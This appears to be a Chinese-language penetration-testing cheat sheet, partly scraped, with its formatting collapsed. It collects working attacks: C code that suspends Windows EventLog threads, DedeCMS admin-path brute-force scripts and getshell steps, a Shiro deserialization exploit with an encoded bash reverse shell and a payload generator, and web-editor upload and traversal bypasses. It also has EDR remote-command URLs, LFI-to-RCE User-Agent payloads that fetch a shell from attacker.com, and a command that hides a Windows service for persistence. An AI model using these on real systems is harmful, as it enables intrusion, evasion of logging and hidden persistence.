(myNtQueryInformationThread)(GetProcAddress(GetModuleHandleA("ntdll"), "NtQueryInformationThread"));THREADENTRY32 threadEntry;threadEntry.dwSize = sizeof(THREADENTRY32);SC_HANDLE sc = OpenSCManagerA(".", NULL, MAXIMUM_ALLOWED);SC_HANDLE service = OpenServiceA(sc, "EventLog", MAXIMUM_ALLOWED);SERVICE_STATUS_PROCESS serviceStatusProcess = {};# Get PID of svchost.exe that hosts EventLog serviceQueryServiceStatusEx(service, SC_STATUS_PROCESS_INFO, (LPBYTE)&serviceStatusProcess, sizeof(serviceStatusProcess), &bytesNeeded);DWORD servicePID = serviceStatusProcess.dwProcessId;# Open handle to the svchost.exeserviceProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, servicePID);snapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);# Get a list of modules loaded by svchost.exeEnumProcessModules(serviceProcessHandle, modules, modulesSize, &modulesSizeNeeded);modulesCount = modulesSizeNeeded / sizeof(HMODULE);for (size_t i = 0; i < modulesCount; i++){serviceModule = modules[i];# Get loaded module's nameGetModuleBaseName(serviceProcessHandle, serviceModule, remoteModuleName, sizeof(remoteModuleName));if (wcscmp(remoteModuleName, L"wevtsvc.dll") == 0){printf("Windows EventLog module %S at %p\n\n", remoteModuleName, serviceModule);GetModuleInformation(serviceProcessHandle, serviceModule, &serviceModuleInfo, sizeof(MODULEINFO));}}# Enumerate threadsThread32First(snapshotHandle, &threadEntry);while (Thread32Next(snapshotHandle, &threadEntry)){if (threadEntry.th32OwnerProcessID == servicePID){threadHandle = OpenThread(MAXIMUM_ALLOWED, FALSE, threadEntry.th32ThreadID);NtQueryInformationThread(threadHandle, (THREADINFOCLASS)0x9, &threadStartAddress, sizeof(DWORD_PTR), NULL);# Check if thread's start address is inside wevtsvc.dll memory rangeif (threadStartAddress >= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll && threadStartAddress <= (DWORD_PTR)serviceModuleInfo.lpBaseOfDll + serviceModuleInfo.SizeOfImage){printf("Suspending EventLog thread %d with start address %p\n", threadEntry.th32ThreadID, threadStartAddress);# Suspend EventLog service threadSuspendThread(threadHandle);Sleep(2000);}}}return 0;}
以下演示net user ola ola執行并更改用戶的ola密碼,并在6:55:30 PM記錄事件4724
執行文件,svchost.exe中暫停了4個EventLog線程
再次執行修改密碼命令
新的事件沒有寫入,只有掛起前的事件
dedecms
爆破后臺
windows服務器tags.php
import requestsimport itertoolscharacters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"back_dir = ""flag = 0url = "http://www.test.com/tags.php"data = { "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif", "_FILES[mochazz][name]" : 0, "_FILES[mochazz][size]" : 0, "_FILES[mochazz][type]" : "image/gif"} for num in range(1,7): if flag: break for pre in itertools.permutations(characters,num): pre = ''.join(list(pre)) data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre) print("testing",pre) r = requests.post(url,data=data) if "Upload filetype not allow !" not in r.text and r.status_code == 200: flag = 1 back_dir = pre data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"print("[+] 前綴為:",back_dir)flag = 0for i in range(30): if flag: break for ch in characters: if ch == characters[-1]: flag = 1 break data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch) r = requests.post(url, data=data) if "Upload filetype not allow !" not in r.text and r.status_code == 200: back_dir += ch print("[+] ",back_dir) data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" print("后臺地址為:",back_dir)
rss.php
import requestsimport syspayloads = 'abcdefghijklmnopqrstuvwxyz0123456789_-'menu = ''for k in range(10): for payload in payloads: data = "dopost=save&_FILES[b4dboy][tmp_name]=../%s%s</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif"% (menu, payload) res = requests.post("http://www.yx-tv.com/plus/rss.php", data=data, headers={"Content-Type":"application/x-www-form-urlencoded"}) if res.content.decode("utf-8").find("Error") > -1: menu += payload break if payload == '-': print(menu) sys.exit()print(menu)
dedecms前臺重置任意管理員密碼
https://xz.aliyun.com/t/1959
偽造cookie登錄任意前臺用戶
注冊用戶user1訪問/member/index.php?uid=user1登錄user1將last_vid的值賦給DedeUserID,last_vidckMd5的值賦給DedeUserIDckMd5修改后的cookie
前臺上傳shell
Admin登錄,發表文章,修改文件名1.jpg.p*hp后臺文件上傳訪問/dede/tpl.php?action=uploadF12獲取token訪問/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[token值]/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=6d0c1893e01a77e7e6ba24fb2dc7599cShell位置/include/taglib/moonsec.lib.php
后臺getshell
模塊->廣告管理->新建廣告,在廣告內容中添加一句話/plus/ad_js.php?aid=[x]
FastAdmin前臺getshell
前臺創建用戶,修改頭像,傳圖片馬/public/index/user/_empty?name=../../public/uploads/20200926/4a91d432904c0042bcd038ea96ad4947.jpg
Shiro rememberMe反序列化漏洞
Shiro相關轉自bypass公眾號https://github.com/insightglacier/Shiro_exploitpython shiro_exploit.py -u http://192.168.172.129:8080
通過獲取到的key,常見的漏洞利用方式有兩種:反彈shell和寫入文件�。反彈shell監聽本地端口nc -lvp 1234Java Runtime 配合 bash 編碼,在線編碼地址:http://www.jackson-t.ca/runtime-exec-payloads.html將bash -i >& /dev/tcp/192.168.172.133/1234 0>&1編碼bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}通過ysoserial中JRMP監聽模塊,監聽6666端口并執行反彈shell命令java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'使用shiro.py 生成Payloadpython shiro.py 192.168.172.133:6666
shiro.py代碼如下
import sysimport uuidimport base64import subprocessfrom Crypto.Cipher import AESdef encode_rememberme(command):popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertextif __name__ == '__main__': payload = encode_rememberme(sys.argv[1]) print "rememberMe={0}".format(payload.decode())
構造數據包,偽造cookie,發送Payload��。
寫入文件生成poc.ser文件sudo java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser使用Shiro內置的默認密鑰對Payload進行加密:
package shiro;import org.apache.shiro.crypto.AesCipherService;import org.apache.shiro.codec.CodecSupport;import org.apache.shiro.util.ByteSource;import org.apache.shiro.codec.Base64;import org.apache.shiro.io.DefaultSerializer;import java.nio.file.FileSystems;import java.nio.file.Files;import java.nio.file.Paths;public class TestRemember {public static void main(String[] args) throws Exception { byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("d://poc.ser")); AesCipherService aes = new AesCipherService(); byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA==")); ByteSource ciphertext = aes.encrypt(payloads, key); System.out.printf(ciphertext.toString()); }}
Shiro Padding Oracle Attack
登錄Shiro網站,從cookie中獲得rememberMe字段的值
利用DNSlog探測,通過ysoserial工具payload�����。java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "ping 75bbot.dnslog.cn" > payload.class使用rememberMe值作為prefix,加載Payload,進行Padding Oracle攻擊��。java -jar PaddingOracleAttack.jar targetUrl rememberMeCookie blockSize payloadFilePathhttps://github.com/longofo/PaddingOracleAttack-Shiro-721
使用構造的rememberMe攻擊字符串重新請求網站
一鍵自動化漏洞利用工具https://github.com/feihong-cs/ShiroExploit
shiro權限繞過
/;/test/admin/page
編輯器漏洞
FCKeditor
版本FCKeditor/_whatsnew.html編輯器FCKeditor/_samples/default.htmlFCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.aspFCKeditor/_samples/asp/sample02.aspFCKeditor/_samples/asp/sample03.aspFCKeditor/_samples/asp/sample04.aspfckeditor/editor/filemanager/connectors/test.html上傳FCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connectorFCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.html上傳路徑FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor被動限制策略所導致的過濾不嚴問題影響版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述:FCKeditor v2.4.3中File類別默認拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtmFckeditor 2.0 <= 2.2允許上傳asa�、cer�、php2��、php4����、inc�����、pwml��、pht后綴的文件上傳后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension為后綴�����。直接導致在win下在上傳文件后面加個.來突破[未測試]�����。而在apache下,因為”Apache文件名解析缺陷漏洞”也可以利用之,詳見”附錄A”另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據FCKeditor的代碼,其限制最為狹隘���。攻擊利用:允許其他任何后綴上傳利用2003路徑解析漏洞上傳木馬影響版本: 索引底部附錄B脆弱描述:利用2003系統路徑解析漏洞的原理,創建類似bin.asp如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應腳本權限執行���。攻擊利用:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp強制建立shell.asp目錄:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684orFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.aspFCKeditor PHP上傳任意文件漏洞影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2脆弱描述:FCKeditor在處理文件上傳時存在輸入驗證錯誤,遠程攻擊可以利用此漏洞上傳任意文件���。在通過editor/filemanager/upload/php/upload.php上傳文件時攻擊者可以通過為Type參數定義無效的值導致上傳任意腳本���。成功攻擊要求config.php配置文件中啟用文件上傳,而默認是禁用的�。攻擊利用: (請修改action字段為指定網址):<form enctype="multipart/form-data" action="http://www.xxxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input type="submit" value="Upload"></form>Note:如想嘗試v2.2版漏洞,則修改Type=任意值 即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,FCKeditor會對文件目錄進行文件名校驗,不會上傳成功的����。FCKeditor 暴路徑漏洞影響版本:aspx版FCKeditor攻擊利用:FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.aspFCKeditor 文件上傳“.”變“_”下劃線的繞過方法影響版本: FCKeditor => 2.4.x脆弱描述:我們上傳的文件例如:shell.php.rar或shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化��。攻擊利用:提交1.php+空格 就可以繞過去所有的,※不過空格只支持win系統 *nix是不支持的[1.php和1.php+空格是2個不同的文件]Note:http://pstgroup.blogspot.com/2007/05/tipsfckeditor.htmlFCKeditor 文件上傳“.”變“_”下劃線的繞過方法(二)影響版本:=>2.4.x的最新版已修補脆弱描述:由于Fckeditor對第一次上傳123.asp;123.jpg 這樣的格式做了過濾����。也就是IIS6解析漏洞���。上傳第一次�。被過濾為123_asp;123.jpg 從而無法運行��。但是第2次上傳同名文件123.asp;123.jpg后����。由于”123_asp;123.jpg”已經存在���。文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號方式�。所以�����。IIS6的漏洞繼續執行了���。如果通過上面的步驟進行測試沒有成功,可能有以下幾方面的原因:1.FCKeditor沒有開啟文件上傳功能,這項功能在安裝FCKeditor時默認是關閉的�。如果想上傳文件,FCKeditor會給出錯誤提示�����。2.網站采用了精簡版的FCKeditor,精簡版的FCKeditor很多功能丟失,包括文件上傳功能�����。3.FCKeditor的這個漏洞已經被修復�����。FCKeditor 新聞組件遍歷目錄漏洞影響版本:Aspx與JSP版FCKeditor脆弱描述:如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞”攻擊利用:修改CurrentFolder參數使用 ../../來進入不同的目錄/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp根據返回的XML信息可以查看網站所有的目錄�。/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2FTYPE自定義變量任意上傳文件漏洞影響版本: 較早版本脆弱描述:通過自定義Type變量的參數,可以創建或上傳文件到指定的目錄中去,且沒有上傳文件格式的限制�����。攻擊利用:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打開這個地址就可以上傳任何類型的文件了,Shell上傳到的默認位置是:http://www.xxxx.com/UserFiles/all/1.aspType=all 這個變量是自定義的,在這里創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.比如輸入:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp網馬就可以傳到網站的根目錄下.Note:如找不到默認上傳文件夾可檢查此文件:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
eWebEditor
eWebEditor 基礎知識默認后臺地址:/ewebeditor/admin_login.asp/WebEdior/admin/login.aspx建議最好檢測下admin_style.asp文件是否可以直接訪問默認數據庫路徑:[PATH]/db/ewebeditor.mdb[PATH]/db/db.mdb[PATH]/db/%23ewebeditor.mdb默認密碼:admin/admin888 �、 admin/admin��、 admin/123456 ���、admin/admin9991�����、點擊“樣式管理”—可以選擇新增樣式,或者修改一個非系統樣式,將其中圖片控件所允許的上傳類型后面加上|asp����、|asa����、|aaspsp或|cer,只要是服務器允許執行的腳本類型即可,點擊“提交”并設置工具欄—將“插入圖片”控件添加上��。而后—預覽此樣式,點擊插入圖片,上傳WEBSHELL,在“代碼”模式中查看上傳文件的路徑�。2����、當數據庫被管理員修改為asp�����、asa后綴的時候,可以插一句話木馬服務端進入數據庫,然后一句話木馬客戶端連接拿下webshell3�、上傳后無法執行?目錄沒權限?帥鍋你回去樣式管理看你編輯過的那個樣式,里面可以自定義上傳路徑的!!!4��、設置好了上傳類型,依然上傳不了麼?估計是文件代碼被改了,可以嘗試設定“遠程類型”依照6.0版本拿SHELL的方法來做(詳情見下文↓),能夠設定自動保存遠程文件的類型�����。5�����、不能添加工具欄,但設定好了某樣式中的文件類型,怎么辦?↓這么辦!(請修改action字段)Action.html6�、需要突破上傳文件類型限制么?Come here! —>> 將圖片上傳類型修改為“aaspsp;”(不含引號),將一句話shell文件名改為“1.asp;”(不含引號)并上傳即可���?��!?gt;本條信息來源:微笑刺客eWebEditor 可下載數據庫,但密文解不開脆弱描述:當我們下載數據庫后查詢不到密碼MD5的明文時,可以去看看webeditor_style(14)這個樣式表,看看是否有前輩入侵過 或許已經賦予了某控件上傳腳本的能力,構造地址來上傳我們自己的WEBSHELL.攻擊利用:比如 ID=46 s-name =standard1構造 代碼: ewebeditor.asp?id=content&style=standardID和和樣式名改過后ewebeditor.asp?id=46&style=standard1eWebEditor遍歷目錄漏洞脆弱描述:ewebeditor/admin_uploadfile.aspadmin/upload.asp過濾不嚴,造成遍歷目錄漏洞攻擊利用:第一種:ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=..再加 &dir=../..&dir=http://www.xxxx.com/../.. 看到整個網站文件了第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..eWebEditor 5.2 列目錄漏洞脆弱描述:ewebeditor/asp/browse.asp過濾不嚴,造成遍歷目錄漏洞攻擊利用:http://www.xxxx.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..利用eWebEditor session欺騙漏洞,進入后臺脆弱描述:漏洞文件:Admin_Private.asp只判斷了session,沒有判斷cookies和路徑的驗證問題�。攻擊利用:新建一個test.asp內容如下:<%Session(“eWebEditor_User”) = “11111111”%>訪問test.asp,再訪問后臺任何文件,for example:Admin_Default.aspeWebEditor asp版 2.1.6 上傳漏洞攻擊利用:(請修改action字段為指定網址)ewebeditor asp版2.1.6上傳漏洞利用程序.htmleWebEditor 2.7.0 注入漏洞攻擊利用:http://www.xxxx.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200默認表名:eWebEditor_System默認列名:sys_UserName�、sys_UserPass,然后利用nbsi進行猜解.eWebEditor2.8.0最終版刪除任意文件漏洞脆弱描述:此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中,這是ewebeditor的測試頁面,無須登陸可以直接進入�����。攻擊利用: (請修改action字段為指定網址)Del Files.htmleWebEditor PHP/ASP 后臺通殺漏洞影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用,或許低版本也可以,有待測試�����。攻擊利用:進入后臺/eWebEditor/admin/login.php,隨便輸入一個用戶和密碼,會提示出錯了.這時候你清空瀏覽器的url,然后輸入javascript:alert(document.cookie=”adminuser=”+escape(“admin”));javascript:alert(document.cookie=”adminpass=”+escape(“admin”));javascript:alert(document.cookie=”admindj=”+escape(“1”));而后三次回車,清空瀏覽器的URL,現在輸入一些平常訪問不到的文件如../ewebeditor/admin/default.php,就會直接進去���。eWebEditor for php任意文件上傳漏洞影響版本:ewebeditor php v3.8 or older version脆弱描述:此版本將所有的風格配置信息保存為一個數組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風格,并定義上傳類型�。攻擊利用:phpupload.htmleWebEditor JSP版漏洞大同小異�����。eWebEditor 2.8 商業版插一句話木馬影響版本:=>2.8 商業版攻擊利用:登陸后臺,點擊修改密碼—-新密碼設置為 1":eval request("h")’設置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個文件里面了.注意:可能因為轉載的關系,代碼會變掉,最好本地調試好代碼再提交�����。eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet)脆弱描述:WebEditorNet 主要是一個upload.aspx文件存在上傳漏洞��。攻擊利用:默認上傳地址:/ewebeditornet/upload.aspx可以直接上傳一個cer的木馬如果不能上傳則在瀏覽器地址欄中輸入javascript:lbtnUpload.click();成功以后查看源代碼找到uploadsave查看上傳保存地址,默認傳到uploadfile這個文件夾里��。
southidceditor(一般使用v2.8.0版eWeb核心)
http://www.xxxx.com/admin/southidceditor/datas/southidceditor.mdbhttp://www.xxxx.com/admin/southidceditor/admin/admin_login.asphttp://www.xxxx.com/admin/southidceditor/popup.aspbigcneditor(eWeb 2.7.5 VIP核心)其實所謂的Bigcneditor就是eWebEditor 2.7.5的VIP用戶版.之所以無法訪問admin_login.asp,提示“權限不夠”4字真言,估計就是因為其授權“Licensed”問題,或許只允許被授權的機器訪問后臺才對�?�;蛟S上面 針對eWebEditor v2.8以下低版本的小動作可以用到這上面來.貌似沒多少動作Cute Editor
Cute Editor在線編輯器本地包含漏洞
影響版本:CuteEditor For Net 6.4脆弱描述:可以隨意查看網站文件內容,危害較大��。攻擊利用:http://www.xxxx.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.configCute Editor Asp.Net版利用iis解析漏洞獲得權限影響版本:CuteEditor for ASP.NET中文版脆弱描述:脆弱描述:CuteEditor對上傳文件名未重命名,導致其可利用IIS文件名解析Bug獲得webshell權限���。攻擊利用:可通過在搜索引擎中鍵入關鍵字 inurl:Post.aspx?SmallClassID= 來找到測試目標����。在編輯器中點擊“多媒體插入”,上傳一個名為“xxx.asp;.avi”的網馬,以此獲得權限����。
Webhtmleditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL影響版本:<= Webhtmleditor最終版1.7 (已停止更新)脆弱描述/攻擊利用:對上傳的圖片或其他文件無重命名操作,導致允許惡意用戶上傳diy.asp;.jpg來繞過對后綴名審查的限制,對于此類因編輯器作者意識犯下的錯誤,就算遭遇縮略圖,文件頭檢測,也可使用圖片木馬 插入一句話來突破�。
Kindeditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL影響版本: <= kindeditor 3.2.1(09年8月份發布的最新版)脆弱描述/攻擊利用:拿官方做個演示:進入http://www.xxxx.com/ke/examples/index.html 隨意點擊一個demo后點圖片上傳,某君上傳了如下文件:http://www.xxxx.com/ke/attached/test.asp;.jpgNote:參見附錄C原理解析�����。
Freetextbox
Freetextbox遍歷目錄漏洞影響版本:未知脆弱描述:因為ftb.imagegallery.aspx代碼中 只過濾了/但是沒有過濾\符號所以導致出現了遍歷目錄的問題���。攻擊利用:在編輯器頁面點圖片會彈出一個框(抓包得到此地址)構造如下,可遍歷目錄�����。http://www.xxxx.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..Freetextbox Asp.Net版利用IIS解析漏洞獲得權限影響版本:所有版本脆弱描述:沒做登陸驗證可以直接訪問上傳木馬Freetextbox 3-3-1 可以直接上傳任意格式的文件Freetextbox 1.6.3 及其他版本可以上傳 格式為x.asp;.jpg攻擊利用:利用IIS解析漏洞拿SHELL�����。上傳后SHELL的路徑為http://www.xxxx.com/images/x.asp;.jpg
Msn editor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL影響版本:未知脆弱描述:點擊圖片上傳后會出現上傳頁面,地址為http://www.xxxx.com/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=用普通的圖片上傳后,地址為http://www.xxxx.com/news/uppic/41513102009204012_1.gif記住這時候的路徑,再點擊圖片的上傳,這時候地址就變成了http://www.xxxx.com/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012很明顯�。圖片的地址是根據RemNum后面的編號生成的����。攻擊利用:配合IIS的解析漏洞,把RemNum后面的數據修改為1.asp;41513102009204012,變成下面這個地址http://www.xxxx.com/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012然后在瀏覽器里打開,然后選擇你的腳本木馬上傳,將會返回下面的地址uppic/1.asp;41513102009204012_2.gif直接打開是小馬地址!
Ueditor
1.4.3.3 .net版本<form action="http://xx.com/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST"> <p>shell addr: <input type="text" name="source[]" /></p> <input type="submit" value="Submit" /> </form>加載一個遠程圖片shell表單在遠程圖片后加?.aspx如 http://1.1.1.1/uploads/1.gif?.aspx
寶塔面板未授權訪問phpmyadmin
寶塔Linux面板7.4.2版本寶塔Linux測試版7.5.13Windows面板6.8版本直接訪問http://your_ip:888/pma
深x服
EDR RCEhttps://ip+端口/tool/log/c.php?strip_slashes=system&host=id 即可執行命令終端檢測響應平臺任意用戶登錄fofa: title="終端檢測響應平臺"target+/ui/login.php?user=admin 即可直接登錄
天r信
默認用戶superman的uid=1POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
從LFI到RCE
當有個lfi時https://www.website.com/index.php?pg=../../../../etc/passwd嘗試包含/proc/self/environhttps://www.website.com/index.php?pg=../../../../proc/self/environ若是存在user-agent標識修改ua來實現rce:User-Agent: <?system('wget http://attacker.com/shell.txt -O shell.php');?>User-Agent: <?exec('wget http://attacker.com/shell.txt -O shell.php');?>User-Agent: <?php phpinfo(); ?>也可以在服務器內部來創建文件寫入shellUser-Agent: <?php $a = base64_decode('PD9waHAgCiAgJGEgPSAkX1BPU1RbJ2NvZGUnXTsKICAkZmlsZSA9IEBmb3BlbigkX1BPU1RbJ2ZpbGUnXSwndycpOwogIEBmd3JpdGUoJGZpbGUsJGEpOwogIEBmY2xvc2UoJGZpbGUpOwo/Pgo8Y2VudGVyPgogIDxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iPgogICAgPGgyPkZpbGUgV3JpdGVyPC9oMj4KICAgIEZpbGUgTmFtZTxicj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgcGxhY2Vob2xkZXI9InNoZWxsLnBocCI+PGJyPgogICAgU2hlbGwgQ29kZTxicj48dGV4dGFyZWEgbmFtZT0iY29kZSIgZm9ybT0iZm9ybSIgcGxhY2Vob2xkZXI9IlBhc3RlIHlvdXIgc2hlbGwgaGVyZSI+PC90ZXh0YXJlYT48YnI+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iV3JpdGUiPgogIDwvZm9ybT4KPC9jZW50ZXI+Cg=='); $file = fopen('shell.php','w'); echo fwrite($file,$a); fclose($file); ?>
隱藏windows服務
Translate from: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/Windows的一個功能允許紅隊或攻擊者將服務隱藏起來,從而為逃避基于主機的常見威脅搜尋技術的檢測提供了機會�����。這里假設Fax服務是我們的惡意文件或后門打開services.msc可以看到服務
執行命令可以看到服務
管理員權限下執行以下命令,安全標識符定義語言(SDDL)
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
可以看到已經查詢不到了
在紅隊或滲透測試中,這可能是一種有用的技術,可以在受感染主機上保持持久性�����。重啟后,隱藏的服務也會自動啟動�����。取消隱藏的命令& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
